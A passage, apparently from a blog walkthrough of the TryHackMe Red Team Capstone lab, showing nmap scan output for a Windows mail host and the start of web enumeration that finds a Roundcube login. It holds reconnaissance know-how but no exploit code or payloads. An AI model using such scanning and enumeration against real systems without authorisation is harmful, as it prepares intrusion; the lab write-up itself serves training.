#BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49665\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49666\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49667\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49668\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49669\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49672\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">49681\/tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">msrpc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">Microsoft<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">RPC<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">unrecognized<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">despite<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">returning<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">data.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">If<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">know<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">service\/version,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">submit<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">following<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">fingerprint<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">at<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF-Port33060-TCP:V<\/span><span style=\"color: #BABED8\">=7.94SVN%I=7%D=2\/6%Time=65C26F44%P=x86_64-pc-linux-gnu%r<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:(GenericLines,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #BABED8\">)%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">GetRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">HTTPOptions,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:%r(RTSPRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #BABED8\">)%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">RPCCheck,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DNSVersionBindReqTCP,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">DNSStatusRequestTCP,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SSLSes<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:sionReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TerminalServerCookie,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TLSSessionReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Kerberos,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SMBProgNeg,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">X11Probe,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">Fo<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:urOhFourRequest,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LPDString,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LDAPSearchReq,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20message<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">SIPOptions,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">LANDesk-RC,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">TerminalServer,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">NCP,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">NotesRPC,2B,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0<\/span><span style=\"color: #BABED8\">\\<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x0fInvalid\\x20mess<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:age<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">JavaRMI,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">WMSReque<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:st,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">oracle-tns,32,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:8\\x05\\x1a\\0%\\0\\0\\0\\x01\\x08\\x01\\x10\\x88&#39;\\x1a\\x16Invalid\\x20message-frame<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">SF:\\.<\/span><span style=\"color: #BABED8\">\\&quot;<\/span><span style=\"color: #FFCB6B\">\\x05HY000&quot;<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #BABED8\">%r<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">giop,9,<\/span><span style=\"color: #FFCB6B\">&quot;\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0&quot;<\/span><span style=\"color: #89DDFF\">);<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Host:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MAIL<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:microsoft:windows<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-time:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T17:42:19<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">start_date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">N\/A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-security-mode:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3:1:1:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">signing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">but<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We have quite a few ports open but these are most interesting to us:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>25\/587 SMTP<\/li>\n\n\n\n<li>139\/445 for SMB<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n\n\n\n<li>3389 for RDP<\/li>\n\n\n\n<li>33060 for MySQL<\/li>\n<\/ul>\n\n\n\n<p>We will need credentials to interact with most of the open services. Let&#8217;s start with HTTP and see what is running on it.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"13-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<p>Going to the FQDN address, we get a <code>403- Forbidden<\/code> status.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09104ab9&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09104ab9\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"256\" data-attachment-id=\"558\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/403-forbidden\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?fit=1305%2C326&amp;ssl=1\" data-orig-size=\"1305,326\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"403-forbidden\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?fit=1024%2C256&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=1024%2C256&#038;ssl=1\" alt=\"\" class=\"wp-image-558\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=1024%2C256&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=300%2C75&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?resize=768%2C192&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/403-forbidden.png?w=1305&amp;ssl=1 1305w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>But using the IP, we see a default page for the Microsoft IIS Server. But this does not mean that we have nothing else to explore here. There might be hidden directories for this web server which we can enumerate using tools like <code>GoBuster<\/code>.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0910516d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0910516d\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"486\" data-attachment-id=\"563\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/iis-server\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?fit=1024%2C486&amp;ssl=1\" data-orig-size=\"1024,486\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"IIS-Server\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?fit=1024%2C486&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=1024%2C486&#038;ssl=1\" alt=\"\" class=\"wp-image-563\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?w=1024&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=300%2C142&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/IIS-Server.png?resize=768%2C365&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"14-gobuster-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">GoBuster<\/mark><\/h5>\n\n\n\n<p>GoBuster was able to find some hidden directories. The <code>\/index.php<\/code> page has a login page for the Roundcube Webmail app.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle 